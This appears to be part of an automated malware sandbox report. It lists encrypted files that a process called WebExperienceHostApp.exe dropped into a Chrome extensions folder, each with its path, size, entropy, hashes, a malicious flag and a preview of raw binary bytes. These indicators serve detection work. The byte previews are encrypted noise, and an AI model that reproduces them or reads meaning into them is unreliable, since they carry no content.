Malicious:	true
Preview:	@...s#.....).^F..h9..:..C>...+..GZ...........nh...(..8.....G.".. . ...z...Rq..}...Lj.E..p.....A.....e7..U.\|.\.n....I\|. ..$&.pw.....5..T....ck....@.(....'....8..}..Y......_FY....4....v..8q..rt.N.U..f...X!a.g/q6X.vt.,.".,.L.0.a.^[...]I..!.P.P..5...I..Bod....~...7..-..._v..X..+...}.......(.z.&.%,.....R..pj.+....'xS....K...F~.}..0.P..a...1..V..c..(C.......M...T..4..&.O.^.....#.rv..3.p.S......t..n]...K~^..j...1..~..S9.;.."....s#'.gl.....I.Y.)..j.1.3..#...O.l.t.....])k.ID7..0]...\|6\|.q.#n.&...V....jp....6..^..}'.K.)....2..S.Kop@..\2...E.OW.j...........!#...G\|{./...}../\|....7..i/..Y.5...u.uTe3..8tn.....G.&.F.u.y.w.O..@.W=.ZO0\|..X...1. ./ms...y.v..Mu..Ew....X...u.......T`.................c.^w+h`... P..............cw..?.I..!......g..].T...._m.if6$.D...{...L.06...Y.^."LUo...v...%%w.).+.0Q._@..WM`....1..&\...V..I/}&.C.:..Z.:.Q...X..d...\|....}.....a.>R.r]......O...]K.6.{.HV.Z...ix.....qw6..>.....2_.0..QJ.{..e..Jf\|.-..... .,a......B~..x..E.......

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.118

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	36372
Entropy (8bit):	7.994711549739878
Encrypted:	true
SSDEEP:	768:K7uBZMznaY5ZGCDJ08STw5JNifGXnkhNCXi8Sc863ApF1SqMoxhCKW:IuBizaYfTJ08nfNEakT8SO3WHzW
MD5:	82F7C75D1D24AA85AA82075203F86CC2
SHA1:	ADEA7C7C9F7481108DFEFB9743916B8703D39965
SHA-256:	A6DD00F5B60E7A2772FE12C8A2439473C70744441B750A9486D8B1652945D0C8
SHA-512:	1CF1E0316D055CA51C03FA4FE39B3E454FA88B4BB48935AE9DBA59FF491789B1827DBF0FDC80EFB2DDB3D93237134F347CA7A9D498BF9E3AF0E6FD510FE6C1DE
Malicious:	true
Preview:	A........&o.#.Qm..}.J}..~=v..l.C...........{......}..Ku..B......9h.P...rI....^`............]...^.OFc.X`.-..G.......p9.n.......{_..rT....T&.....S/....`73)uk%.!.._i..\.......v...Q...^.I..@..9....;...;..lw....4x.b..{x8.\|`....{t.kh..'.bj.fu......z.SHU.h?Q.\|4Ol..cAV.........^P.\..G...rB.".=l...............\s..7Bx.w...Z./...m9/....y.@..y&mr.K...v.v.....m...5.w8$.....Dz...k.C...:...mp.v..d...`..C.._A.x..$8.Lv.G.5;......F.c..l.....z@.opE.../..J..M.Lk.u$=.O.9k..........{.....=...c.^.6<...;.8`....E.....9.....})K...l..$.z.\.BX{..`..qMY[..7.4...yM.b.......S}....Bm.\|..0.rX..g.v$a...$m......c?....l....=,..... 74..S..-S.0shF.l.....ClWp.6.1K.......%.h....h.=p..@.a.;...+XZ....6.L..,.`.k_.9.x.@.7...Ju...^].t.A..Z...w...'.j..Y(.3%n..'s....U.%..\.g....\|]..0'...Q.?Q[.H.)$.....pF.rO..:.u9{~J.]P$hr..i...(.._....@.....:.".^X.S;....-o...eE6..G....#....g.. ....'.....^.m..+.........%....."4....H~....1.....CS.Jy.g....\|.RH..p..f.2ck>...;.CW..d..M...'.F.\.`...p..R.

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.119

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	91528
Entropy (8bit):	7.997809403253262
Encrypted:	true
SSDEEP:	1536:TM2TyiKbNoW7T2wAblzMd868hzKqKw26vcf7eLMsyVOkWFkXlvDq+YQ:TxTy31T3Av68hzK974cjeCOknlb9YQ
MD5:	7895F5E9AA9FFEB607995F095530E06A
SHA1:	7CA6D5A406845675451F70182B31FC5B33689D2A
SHA-256:	6014F2516653259DD44429382CBC0171E594697792F0FD9AB495859167C83AF7
SHA-512:	F8F47EB24C1BFC00F8D2F91A4EA1052F343AE9804498428F8368F2F0BB851B3EB6E8C73D19A3ACF75E255803C21C9D413FF5CBBF74165A81E12F18835E6891EE
Malicious:	true
Preview:	..E.-.^#>.....C..../.J..)....l)..X.....r.~.."YQ.d.#."....>v..'u..E";.N..`.....`.k..Q..3..L.U.P2/,..l.Tm.1V,..$..C..s...z.....f.L.Gx.q.5...f.k......"...J.p........\..$..=.)+....J4.\|`.+6.............1....\|p.......}5...^..G.)...W.W..dZ...i.:M..fx..y4.7...@..R<:.m...q...[M.Z.z.q;.W..?.5....?.CS.<._..j.L.=]..ZF;..X.....)va.L<9eI....r..b5.S.gh..vh.s!..g...Z.>y&....v..pf.$.O.._z',L.E2@J}.6...;.z.C.r...z.e.K...@.....a..9My.....y...1....g.,.C...^..o.@.....T+..t+C.~w.i.......xw#.0....Y.....'.^.....~?.9^J.\._3n8q.wn..k..4..BYo.j.......E.u.k..$../k.@..L...........@...)FiIy........k..(h.Z.......H.1`.z.<.[..S.. ...`e..t...x...at._Q.e.%..k..Z.\|....C$Z<.-B.N.w/..a...i......S.kX..?.Z...&..@.W.5S.....2.G.yM..@.%K9.....OB.>2=..).-@..r...,...p!.>........M'...`..C.W.%.X.V.....+.yz...z....V5...Sk.......1D........5.=....3.(~".3..G2......X.m..+...iC0H.%C..p$..=..........\|a....B.j^.\}....2...:m.u.x....;...P$.}....f..0a...[.......k.g....N~3...+..:.x.v....../%(..W"....O..:+A.f

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.12

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	43413
Entropy (8bit):	7.995732888617455
Encrypted:	true
SSDEEP:	768:t1e+mn6GYHpdNPZYVcGKHqbwGah9eON3mfx+GqEZ9hsn9EUPo+:tQ+mnUwcGKTJh9Rwjm9EUA+
MD5:	825C6BC8D255C8ABCCDFFFE0AA79B82F
SHA1:	FE2134078B7D5A07EC1C4D0476E0AAA5C40D39D2
SHA-256:	247D839FADCFAD2D0275411407C4E4F49197122CD7DF6206D584896A06B84104
SHA-512:	E29C18B8CA02A67D55E70C2100CDACB495CE35F295BDEC73EF45137032528EBF8127D6214CBF3E039DBA43CCB58A0B0E3E2A283C74A7DEC9A7F128768E58E603
Malicious:	true
Preview:	.q34.O...\|/.....T.u..u.1...:..-.F.l.U.....+.F4..:R;..Z.@.?o.Z.......w..Q\.G)I...b..=..............U..Q..;"...=..........].9s......D.G.....k.m.uY]f.L4V.p.....=..p....J..J....6.....\|....Cy.....PSf...aM..dq._....J....u."V'.B....d.L.\|.k.xo.}..\|..$...2M..rB.....{s.,tBFgF...<.}.B.B....[.8.f....<0....q9.n....h2.\..&n.....{C.28.Q..(....&..~.c....p?..6..).)f."D8..}Ka..NZ.......nT..W.E..\|.so..\|p.L.M.b..,.w..F...}..u.Wd.4\...dD.s..@.....L....l...;...\|.]..i..{....i...-.....W.o.I.WX.Xl.@.....Q.*.1...D.+a%..._x/.]..B..l.?.tU.._.PTR....[.L.u\|...=_...0.."3:....f.L.9..g..v.....M.ZU...))..y..{...'~\.^$..}4.H..k.............7.C...AP;..X7V..(bu.M.:M.B..S....m...h...\.h...[...~....H..%.,c....H.....JX~/d[<.i...&....Q....j...:....8w...\|<l.a...b...?./%.P...C...0qv.i..!..d.1$v..w.6W..'...7.l.;.b.....A.9.oJ.&.k<H.I..>ro.....'.u....[3....N5.%.!......>...U..9..0..X...t....<..o@.$].s).......2..T...GUJR}.Oe.zF..O......%........r/g..e$P.\q`..S -C..C..?NS.e..ay..I!(...

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.120

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	34075
Entropy (8bit):	7.99419790942373
Encrypted:	true
SSDEEP:	768:Gsl2TD5b6dE9JS2tfrc9ViEvepTAf1IEMgH:GzTDQytfrc94EvemtH
MD5:	AC6719272D6956D378781BB6341E549E
SHA1:	F2EE51C53999DC6E608CCE7D7F94DFEC0BF01C34
SHA-256:	2FBE2C9FC3E8ECA9867D4640EACBF5F709FB957D64757979AC52D9EB4A478BD5
SHA-512:	1CF01E1325A6EF5633E0EE9320CDD7EB10B6E18D2726E62CC9DECAC53D4F6258243A2DF4005C01D4AB6EEE0872294CB2E9A791FEE3B93C80DE425EC8D7C741E9
Malicious:	true
Preview:	....\|<..'.\..."...!..\|..l!..t.......f.5.y....f.>...U.....z9o.6....I.......A)...~Y.M.....<p.7..i.Izs._.&)..c..V[...".TyRV.L....".KP...A.\|...#u.]....\|..}....}....M.H....Eg.&.<.....ou..-um.f)zA....T.b...W....Q[4l.&...1~.5.cB.kJ.ez._<.2o..x........h.H.~...>D.j.G.:.e......z...,.P..../.).;.K...R. >..'Z.^f......+#4. .w..;...`.....)k.....K.........qy.et?v..._...tce.....i.K...N.....55..~..Z..R.O...e"2..g..u%.....9.........w..4S....IZ...[@x...d"........f......}.I..........G..h..$j>wY.\Z..dv.\|...F..OQ...Oe...; .DFn....E......V...y.&.YgpL.IV.5.)X%....u..v:.F.8M.......e.......)?.4..{..UV..X...M......Y..;..O.._^X.j..7..a\|.#..e.......7...oDh.5R...YD.)..nr.q.........'...f....}9$.].6.Z.'..P..h\.xgwo%>.>..].]S.'.4}r...H..=...V.".^[.Ng.u.W...4v..%p.2......*.w2b84.....?.....4..1..r..h/.JE.m.....?{:..I..d...[..t].o..^..dH.... @.3_..6.zg...c4..E..:....)...7..BS7.R.Q.F[..Y......g.....I.....#....W...<..Xe...G0..r.".:0..D.d?.D#T.:..[..p/.....X.nL..`.#.%.1.<fDB

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.121

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	82658
Entropy (8bit):	7.998200093294084
Encrypted:	true
SSDEEP:	1536:YdvxckIg4UNK5/ZWLNQMDivHEStvroUqFvuBvBLyFqdVLln7h6Jf65Z2a/mUfMGd:Cva7fyUZxgStvroJQpAFMpn74JfqAa//
MD5:	A23BE06811102A6A68C6F04ED143C8A2
SHA1:	D58CE4DB2F79B5ADA2203F00DB23ADEECE381AFB
SHA-256:	8D6BEFF91A3715E9D8CFAA38F2EDEDF08131D4D3E4DE190DD203749C32FE29D9
SHA-512:	D2DBD9C64DA5B87C791DCE94FB92D2FA86DE2A12B009F5A36AF8B4FF395ED45C54D68C8BF4961E6ABC13BE1E562E630A7B012606391824A01555B43657EED9F4
Malicious:	true
Preview:	...DW...}...[.8{"BN..6.-.:H.>.D#[.p~...D.C..s.Ms.....+/...O.....+..1 .#.. b].yK.]#p..9..I..E.....1^e.1..E..5Kw....$.....M........f./..B.]h....u.o.U...-.9.ne.L........;L.^.H.3L..d<.B......8!P.C....M.,C~B...2..$Hf.K.b...~.xI..`...V_..K...k..w(H3..@...dc....[P.k....L...}9..NR6...I..'t_{....=..Gr...S0i...F...^8o...Rv.5.N.R.G...=....=\-x.......I.l.,.$.Fp.c..Hi...r.0o.........o!.BKs`vj...G`...Q..`...b#..f.....WTJ.P.<}9`....t..._.T@x....._yp@ 9.+...b.P...-iZ...,1.t.......-u.6J@ltpE...7..p.,a.....0cF1^...E....... .Z..E.......7.....R.4N..J..uU.!..I&.....z0h.O.rx#y.q..>..>.k.M.#........{T.G2..s.......L...._.Z^&.."..\.0?...Db+...Vx5....&<...(...d.N<..Cs...g.(.I..[.t.e...n......l.,.......j.....j+z.s.......8\|`.sy.zO.."R.q.\|.X`..../1.j..=......F,.x..Z.=F.y.T.7&...y.m.T..bE.U...@..VE..t.B....?....G.....{w..D'I..pUAwM..JC.....;7")s.....C[Q.M..j..7.v.J..7k>...rJ..&.q?..; .....4M\..}..b...HUu^&oH.\.2.p..1d<.I.>.G`I....,.....%<!.r.J...7...*..u.\|UK....a..

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.122

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	25552
Entropy (8bit):	7.9935670475036895
Encrypted:	true
SSDEEP:	384:yJ/J8EY3KC1Wv2T3gzNpv6aVCHgT+k6h1ci9k7HAKU8Rt2K9Qnm/yf:qU3Kdv83gzNMpnhqsMr9Qnm/K
MD5:	B118DE4C565F9D26A5DFD05780C81E80
SHA1:	D338CE01C4C9A8B15333697A408BF3E8982378F2
SHA-256:	66CF1243D1DC57C256AC69A80341E13B00672F5A3DEDA12592A68E1A6C1D24F3
SHA-512:	E5E8D8CBDAD4846D1B3A594750410FC9EA6429A8D209A067FC80A9082086D82327C8C0BF86D02520CEAAA13CA596B020C77340EB25E59310C88F39B666413A7B
Malicious:	true
Preview:	..y.... 6c.v...z>.S.&.....Eku....pL...>.Rw..[..5`.jP..5......Pl......u.l..&Y]...T...0.y.Q.J.`0A..A....p.Z.[!rRs.C.@3'2`'h~.K"{......b;..}..\|<.2.....i%....... a...R/...Y8YI-...oQ$.l\.0........Q..I..40..$p...F....Du1..f..S-..........>...>2...J ..]...zrm...&K."~..0<.V.n:R.P....,\....-...3......./.T!Y...(...K.._.........1E.,i... ...J.w..]^.<?.#...'L./B.\|w1..;./a.8.....M...:Qy1d0s.~<..c.Ym..R........J......x....B...e......P.W.6...p&k"s...^...E~;rlG6.pu"..!..j...(S.O..]r.MW.......$blc...(2g.`..].Bm..c6O.........[.(;....r.....Of.......7]u..C.=.D.Cx....J.g..$..T........XM....4.4.z...w..B.2E.Y.Z.\.Qw..=...`.8j.b.O.h.J.a.....Y<...E.?.7.w..~0...\.+PY....4....,....1Z:..-.U......Q..........c$wn.w4l.e~..S6I1.].I.G~..f....cf-I..b....4..^.u...V.A....A.Qi)......!...ZU..+..YJ...1T..Iam..8EC..8.GD....N.F*<F......?..7...8..m..`'.1...r..G...J9.Q.6......=.Z..$`o.yV.........7.g.{3/w...dE.+.M]......h}.....v.).^M...-Pi&U."%...cx.>.0..S.7..$/C.....L1q.

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.123

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	159374
Entropy (8bit):	7.998773738175384
Encrypted:	true
SSDEEP:	3072:X01tCIH8orGX/LUcN6vxDinsDZ+WBzJWkHLtmbx1eH03:X01EuGvYtv1P+WBVWkHLtm11D3
MD5:	3C6307C476A3683387EE6DB0DDAD1E0E
SHA1:	8CC3F346552397F3D91411055E3F299687AA81E4
SHA-256:	3DD1BFA0118F4C06861FE5EBE3D24C95B9B8DDE2A81F814E15D4B5FE3F6406D6
SHA-512:	0D342EFC0D1594A820AD8F92C0E8A339A8FE32E675EA96ACEAC2A0B78953A0F447E40D8C4EDECEAF799E5E6B9631ECA2ECE27653110CE6402D66C56953A6B26C
Malicious:	true
Preview:	..k...p....WO.e..dK.....j...=.l5..`...k`.#.^.O....7..o 0.K..H.WAo..+..k.T.....!.G@m...:...A........^.dy..6...p...t..yt.f.)......nw...!g.E2).ku..e....._......$S.........Oz..]..2.b. '..\|Xy1..&L....i3b...,m../..)0.%..U.6.MJ...S..........b..^SL...E....R:Mk.5e.6.r..I.m.....y.[^....1.......u22...D0...^.b?.H.>UE...g.......h..O}..Jp.....n5.>C.UN.&e....Y&)_.).-._....KN .'..C..4......`2.".D...O..vV....A{...M.]?.w....R..4...+....X...p.\|......+.81...B..?........H.H.D@S..... .}B.4.o.d.g...`p0.u. .....BZ92n%..W....#....`.......l.......k..{.i!..G...Z.n..\...=$.('...w(\..hgQ..%.a.=W.m....M...$.. \.8.Y...D....b%#8x..I...cDED=h.........P...C.}...8.V....S.T.'A..EG.e...\|OJ..N.....R!.`..&.....}..Cm"...m....-...+c.h.@..jz.....OY....s{..j...ZTmM..cK.U@w..._.)..eC.....Ex1..5,..+..y.J...qY.(....=.....v.I...2I...fmCT.....p.<...~....s^.qd.wG.U.O....5.....a%.A.)....3......Q.......y..~Q.D5e.y...{Z&.. ....>...p5T..UV.?.>F.....o.[p...f............A..m.{%.s'm]C3

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.124

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	83177
Entropy (8bit):	7.997820367544763
Encrypted:	true
SSDEEP:	1536:Wa4N/yNuAxxMHliuIZ8Uoe6Vge7kaPL7JUGQ5cXOpgX2pr+43T:P4Fy9WdICNb7TXJUGQ5Qylpr+C
MD5:	931F81F2E32F5C2F7F7A68E7F23724B3
SHA1:	78BA60F09DB46BB22A03845B85E7575E773755EF
SHA-256:	175DFE67454227081AB166CF338CFB3854561F648BC4B9444CDF67D027EFAA72
SHA-512:	A87DF23ED28ECC5F43D6C3B4E589F4705002AF58C43813D32A2A1AA5FEA5038444C4E0458914BBDEBB78606D1B17B4B94A8068D62A01214C8EDD058860889FD5
Malicious:	true
Preview:	\.+..Z.z@I....ix..B..-.,...1;.......X.:I4.Z..R(..l....O..$K1.x...H.A.o..o...t-Q....V$.c..6o.s..a0..5.d.:P5.?........\..R.^..0.\.&+.bz.K ..z..P......P....o.G.;;..e......5..p$.=./.sz.. =....i..V);6...".....\.)];.'U.+ O..&=...=s...?....dbB.........[.._.....>.$p.....YC..I....@.E...(j.}.eo..).(.R.+'p..g..)+rs/...%........W..5...$.Z..t3..]W.....R..i...%.>.._....e.f+..h..T.....8..z.GvW.<..>%..2..^.....?XV.....S.un.K.}1<..ZQ...)o6.....e.F....+.....)..>.xMC.$q.TN.\|......}lX9t....V.>.N..,.C.(j>4....Wa.......O4.h!P.....V..k1.B..O....$2..........lV_.I.d....N..)...1.z...vm..e.)c......,..z.....5.......2.k.fQ}..d..%b.>.co}.rr.<.P ..PN...R.....)..nJ..A......Z.R\|.1.........E.d.a.J..i{...[N..g2g9.d.7`D..}.m.6...'..\.\.......mG.....p.9..o......FKF..T....w.M...#..T.\..n.PH.(....Y..%.9....$L~u...........XG_..~....O..H.%....6..:.'>f....:.X.M.Z)...\.F..ZCf.O..X...[.u.e.......]...{.\..6...f/.....XQ.G.N.a4...G..c..F.'...6I8.B... Hc.-.[.Xz.+(P.Q..h....[7.x].*.

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.125

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	91144
Entropy (8bit):	7.997903537205584
Encrypted:	true
SSDEEP:	1536:uydEy2hCtdX7GLIdhZJx7t94YPjGDWlCMgzOUF8DCBQRVUNi4DAIlVCIOw1AVeFJ:ucDJAED7sq2nzJF6CyDU84DPy5w1AVeX
MD5:	248001727FB11F5C6B50AFBD2C4DCAD8
SHA1:	03BDD5C3B1951E957AC40CAB7126D7F844823209
SHA-256:	B6424483E87036C08D69758E3FC133A63765605E949E49EE7AD3ABAA7F57C6C8
SHA-512:	504C13286D588F74B27B023C7967F62025D747AA70A1349DDB48A57FD54E448E059CB0CB77542D1417199F5D0C7FC6ADE4BE998E7029FACEE31DA3A3D33D2F18
Malicious:	true
Preview:	.6..PJ...i..("..4.'4X..1............M....!.T......i...<h.\|...W....Z.R.....4.\|,~0...Un.n.%6.u.(..U`N%.<.;i...+z.....5.\|.....d.#.s:.$g.iAy.y...&.@7.wEp.....7'.~8.....+.^....9....l.")..AQB....Q..X^.L.H4.N.#dI....6..8.MF....ZW\.~8...i.l-.\".7P[.0.Q.u...B...&.\|.`.0.L.S..6....Vy.CT....){....+...?PK3..C.[.....p...`...U...-L.t.....oP.ghT.../..p.Sn2p...0u.o...:^..?.huWu..&....@3z3S..]o.,.Q.Iu.?bM=.<.......}..<.:v.2v..5.~.+.2....2._t...O.v$..:*:.[.."....Lh1..+b...Y}N DJ..s...,..3(1.....U.w."H.I9.j...Y...L...3As~S...R.vY......i..tKv...\jO...-..7.G.....j]."5...T..2.P:......./..q/.1.H.(_.e\|;..WE&%....B.N....@...Y.h....%r...%...%..Q..{...Q.>+E.x._.3...k..9.......e..@qgb9.k1..$....1..5=...;......&.=.=.Y{_..i..gFA...V.....h.}z...M.)..5...7\~l..K.^...H[A}..........=.....pHW.....%.jeMWdyO...e[..)}....o..3.<.b...0..v........?.......f.N.c.].K..?.Z5V.oQj."t.0.....q.,.._.....9y...iBuM>k..Q.4......m.`........]4..P.5.xU......P..W._....vp.......thg...I.

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.126

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	OpenPGP Public Key
Category:	dropped
Size (bytes):	85182
Entropy (8bit):	7.997953961827474
Encrypted:	true
SSDEEP:	1536:TpWbu8hSfroOuGhuI7QT2U3bmYRzmiDhY1wSLwZg3rXs9vPucmy99b/TiHe3YdRm:JjzoFGhu0W2EBjBULYvtmy7iHe3cbk
MD5:	C42541122EA3F92912C2C9F6B66436C7
SHA1:	7CB18EC967B1A7EF3419D88D904B3784522D5437
SHA-256:	C57FAA6E91193CDA62623DF55E4903BDFDA46CD48E3C1E6F3947A74B8A15048C
SHA-512:	81E3BF61BD468DCF5AF9AAB12B6DC2F4E5E8F4782B76D0996137A90C3B4A0768F6E09BB9B40AFB99DED9AE4D7B29F42AAC4C4FD53F57158FC537A64FC5865943
Malicious:	true
Preview:	.a.#..pl..>.M".]QBl..]F...........J;.89=..UZ1..X{.2.u...Bo..Ur..E.....4..f.......RG....B..5X.n.z..(..D...W.8h._.`\.r....'%C.7.>`r?....'.'.S.....2V.....VYMf{B....k54jh.......;..E.....Y.[.v.a~.~.45...p?........sWg).T.A.E0.g.B$..!.l.Or.......C'8..!.<...?..L....:P.t.....[S.>.L.M)...YAl}....'.R..E......h?.....ig5..K.&.K>.S\#./'z.9.).N.....^..y.@.w.."4?8oh7e...c...&\..(.6..E.3%Ss.Q$..H..;.7. .j..B..M...)L.!..6..b3,w..GZ.y.Il..xb.#...l+...J...5.I..ww.Y.&__...(..P.....~.. ....W.o.....X..e.u.%+..=...M........zD..z".r.......?O.]..8A.=TV'.....0...+@@..#r../Q..O.\|._s...)..F..7:.r..&.f....f...9.n@S..i.4..{..w.H"9.{.j....A......q...<{nk..5..u.......v.........~...-..r..u...F.Y..(.C..n..Q#.}..O\X>.7l.Js..(...R.#b..\u&..L..R..E<.W..n...V.W.:k.,]R...x.....J..........x..3.r..(.......&.d...O.'.v..q.r_...5..C....[..5R..p......\.........T....#....a..F..q.. D....A.9.......P$H..<.5..).A...m...(..Ka.z....wZ;.?.x.......V[.7}*.)..#....9....SZ........=.....[To....\.

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.127

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	100405
Entropy (8bit):	7.998190619536125
Encrypted:	true
SSDEEP:	3072:Q+WeOazbszKIwkxCydCTNNDQz1XwoH4k+xgwA3:1TbzbszKx5yQpNDwwN9A3
MD5:	2E8EFE34A781ABF1A05EB075197B5791
SHA1:	23999005B9DC0575591847A8F3C56CFFA45205FB
SHA-256:	1C821B066531B7AC9397EAFB60728FA7A4998611B0344AAE0F384C10552982FE
SHA-512:	2E930B202094D95AAF9835ECE7D9A415AE747B01E87F078C5799F57C3F557FD246118BEE6A05DD1CCFA0D62E67AB47B382766F732E95611183488A4F9AB021D6
Malicious:	true
Preview:	.SI.....@.%D.P...F`.....s.N..F.~.y.V.}x7w.Y.a.BT...C.C..KHPh..s.y..#m.U.HpI.H....\|H..I.........;.$:...f...lx...q..jh...=]....;@......Ay.....(M\|.&..d.8p.PH..h..........n...y........]..SZ..+.u.9Z....h.#...-...r.yX.S'X.$..NK.4.@.B..8,..}4.....FSF%..Lf9,RWub......Gk_...P'.zo....y(._......DU......z8..L....W...U`./.C....~.).@........9M?^l.b.h....-.58...H..#..D...c>.v...............j.K.EcE...\|apNG........~]......+.5.0s2T.g.V]....!.n...Yir5.to..O#<Z.N.X..[qC.@[....`Y.6.Y%W..vX..........`.h...F95.[.vE.^..pVN.84..6....X.7h.w...4,=.$.e.&.F.^>[..M..UYd...P..2\..0.U.p...&...X....'...U..z....+W.xA..N8WLv...F.....bk.&"_e...".H.y.....u..$cj.$...iK..9..E..V2..rR..um...V.."l..Mc^..m.1.....[......^.+U.7..?z....+..}.7........@....Bs.......n.....+...?.......qSWx.......[.F.=..v...o.4.^(6..}.W....c.:.Dk.`.7...y.R.;.{..._.......k...Gl.o.fj..uI..[...S.....L.%............#Q.Ii},...(.?)X.r#.W.......S..\|MT.....g..vV....@..%..u..7S/.".K..d...G..4......-.*...,.aL..\|k

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.128

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	43583
Entropy (8bit):	7.995787073284486
Encrypted:	true
SSDEEP:	768:dO7hXlh8QsjFbzita7Or2u4/7Hv0bUPIv7YAh7R6MDKdavoHTedvXOeuiz6J7:dO7hqFbzs2uK7Hv0QAv7YmAGeaAzedxk
MD5:	BEC41F95F6524AC749D806AFA5DF4A00
SHA1:	87B4599511670F18EEF7021A84F3A39F74BC6A30
SHA-256:	95BBA1729C2856D38DE67007C0400D029CEB2952A14C03CB48C86ECBF1838824
SHA-512:	C59D1D06C0A7404C9035977CE607E8672532A17D1FFB7EC125653E4D89E38DE26C448A28B5EAFB3DF2D4F9E71A7D55EB34290DB3A2A20AC617422E4D3CD6558A
Malicious:	true
Preview:	$..k.L....f.C.......V.ir..W........Wb..P.......zq../..S..e..Jk.....q..]..@m.:Wf..."\|....s.....)P.S...G.....7.;.N.a".`...CT..K...c...~..b..7B......62...X....[&..".....Pc.7(.W+.V..S.,L.\|;........U...h.....Et.c.U9..`....f.J.-..E..a..iGH,.....6Q<......}(..))]..\|z../..#.T.?....z\.{.."..`.[...\|..z.....3......`....s..X2...a5..Ai\|.h.xiC.D..8.0....`r._ei.2j..M...3b...g...}b_7.........a~..B.VO.}.AK"!.1..ca.Q.8...S...=[.9.W.#....C.V..../...v..h.k)....#.;...D.1.5........\..k....j...^.....@.E..2...4.tbpN ...f...x.......5...@.I?.&\|2..H/..0Ek.5c.&..>.Rj......;.V#..b.g....\|&....t/.X..\|.2..,."V^.l#...."5.....V...2.@.....h.8.8..;.J.I-.@.0.p?'.S..C`.b....I...v....Z)GK....Cm..j\|i.;.;p...W}`+\l...b.."..P..W...6..1...f?...}J.k.&..O..w..`..R^..'F!...`.J..)... .....v,.w\|d.i...C-...{Y.+.,....I......Ia...MI.`..b.7S...2.......0...i.]...C4{.r...`...$u.}QM#...M..rAg...\0B....We.\......).S.Z.>.}..<.....\..lD....I..i....%T....[S>c.A..].q.g)...Q*L........

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.129

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	90675
Entropy (8bit):	7.997679201177581
Encrypted:	true
SSDEEP:	1536:ziWmgTomDoBlH4giuP+d2oTW/SmsEnEcsn/yIvYPzUrsV0Gh3803kAEYIRyzixom:mMTve4gH2dVzXEnEj/yIg7Rx3803Dckw
MD5:	7A2C2F21A9735BA8D79CDFD2E2B11A05
SHA1:	B8E44B13551AE586CE2427EDD0ACBD6C065CE306
SHA-256:	4943B9DA5488B5F3E389F9A8E566537A4639763C8928A5D66E712D45ED9BC554
SHA-512:	3AA844969BAF33304886B3619000AADC82DF73A07B84559383B2A21C458DCBEADBB5DF0A7C6FE74C01A3C8882C3A99E81C23777498971690C9A89DCC303B8B32
Malicious:	true
Preview:	U/. ..P.....A.SO..%.A....\|CYf.D.O.>.aY.{./#..{..J...e.d....D..J=H.7..%. z}...dB......W.z.t..5i..T...@6.L....3..[.H.q........}...Y....u../..8n.....A.!../...&.S..&.%>+SHrcy.....]M..6.M..X.I.n....(X.\|a.. ....%....!g..\|.m.?U........KU... ....q...6.g...K.a.X..)...."...-.{S....... Z;..m.Tq.\.A.....E.R..d..b..Nl......YXM.6.'v.h.Wf\|..F.....>.....k.Z.....([pk6..70!11x..<."$^k7..G.s....&..y(..._..d......`.L.p.R;.[...2.+PL......=f...C.u...........G.)Oe...,...E.o.a,..B..M..i..3."........h.i...Kz.J%..'&..p..$4.....~..]<5....[.Q...L....5.u...K.....M&./\eG9F.s...,I..sg...d.~.&.....Qw.pv~.Q?.......KD.G........&..._^...,.88.w...t.Wf.7..w..............;/x.#t.T..Y....m){.....r+...y.XBh.:..\|.........XF.z.:`....K..<d.a.j."..-...UT...cyI).@...bY.+.c...q.K.@...P.....A..M...-......+cx.....c!.xE.....ls..n..P`.J..#.y.5dwu....q.ix......F.Qk..X.....I~.....U..s.....+....`..m....j..Z.!......VpsDl....eM1f.sU`]5.q.r..])..9.o...o......2..*.:..0.(.T...D....\|.aeg.....

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.13

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	PGP Secret Sub-key -
Category:	dropped
Size (bytes):	36824
Entropy (8bit):	7.995550572572611
Encrypted:	true
SSDEEP:	768:+8rr/EDdU0yKCPEO6eGSnllQhb5Ot6v+mWNtyKIHj:+8XsDMKi6KEh1O+D
